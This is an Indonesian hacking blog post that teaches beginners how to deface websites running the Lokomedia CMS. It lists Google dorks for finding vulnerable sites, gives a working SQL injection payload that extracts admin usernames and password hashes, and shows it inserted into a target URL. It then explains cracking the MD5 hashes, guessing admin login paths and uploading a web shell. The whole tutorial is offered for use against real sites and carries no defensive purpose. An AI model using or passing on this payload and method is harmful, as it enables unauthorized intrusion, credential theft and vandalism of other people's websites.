Senin, 26 Februari 2018

Tutorial Deface poc SQL Lokomedia

Tutorial Deface poc SQL Lokomedia - setelah sebelumnya saya memberikan tutorial - tutorial baut defacer pemula atau newbie seperti saya kali ini saya akan memberikan tambahan materi yang lumayan populer dan sering di gunakan yaitu tutorial deface menggunakan teknik sql lokomedia.

Teknik ini sangat sering di gunakan karena terbilang sangat mudah untuk di lakukan dan tebas index pastinya, karna dengan teknik ini kita akan langsung menemukan login admin dan langsung bisa mengeksekusinya.

Baca Juga:

baiklah mari kita masuk ketahapan tahapannya, cekidott...

Persiapan Bahan :

 Dork :
    inurl:/statis-1-profil.html
    inurl:/statis-2-profil.html
    inurl:/statis-3-profil.html

 biar lebih mantep kresikan sendiri.

Exploit :
   'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

MD5 Decrypter :
  MD5 cracker

selanjutnya kita masuk ke tahap exsekusinya...

Cara Deface Method SQL Lokomedia :

1. pertama dorking dulu seperti biasa dengan dork yang saya sudah sediain

2. selanjutnya pilih target, terserah kalian mau pilih yang mana saya saranin sh yang vuln.

3. setelah itu langsung kita exploit dengan exploit di atas.
 contoh :
 http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

note : yang warna merah itu exploitnya.

4. jika berhasil tampilanya akan seperti ini :
5. setelah itu klik CTRL+U, dan ambil akun adminnya di situ, biasanya paswordny terenkripsi makannya kita siapin pasword crackernya.




6. copy code md5 tersebut, kemudian pastekan di md5 decrypter yang sudah saya sediakan di atas.

7. setelah kita mendapakan username dan paswordnya, sekarang tinggal kita mencari login adminya.
    kalian bisa gunakan tool admin finder koleksi kalian atau kalo gak puny yah cari pake manual, biasanya sh di :
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator.asp
http://target.co.li/redaktur
http://target.co.li/admin_login
http://target.co.li/user_login
http://target.co.li/administrator.php
   selebihnya pikirin sendiri.

8. stelah kalian masuk barulah kalian upload shell kesayangan kalian. caranya? gunakan otak kalian kemaren udah saya kasih beberapa tutorial deface pasti kalian udah pada fahamkan?.

baiklah cukup sekian dulu tutorial dari saya semoga bermanfaat, kalo kagak yh manfaatin ajah kalo masih belum paham yh nanti saya buat video tutorialnya. selamat belajar dan sampai jumpa di tutorial berikutnya..




Terima Kasih Telah mengunjungi Blog FHXploit Bantu kami mengembangkan Channel Youtube dengan Subscribe di Channel FHXploit. Dan Jangan lupa terus kunjungi www.fhxploit.Com untuk melihat Artikel lainnya.
Klik Untuk BerKomentar

1 komentar:

Paling Populer

Entri yang Diunggulkan

Cara Connecting Wifi Lewat Cmd

Hallo fhxploit fams! Kembali lagi bertemu dengan saya di blog fhxploit. Pada kesempatan kali ini, sesuai judul yang sudah terlihat diatas.....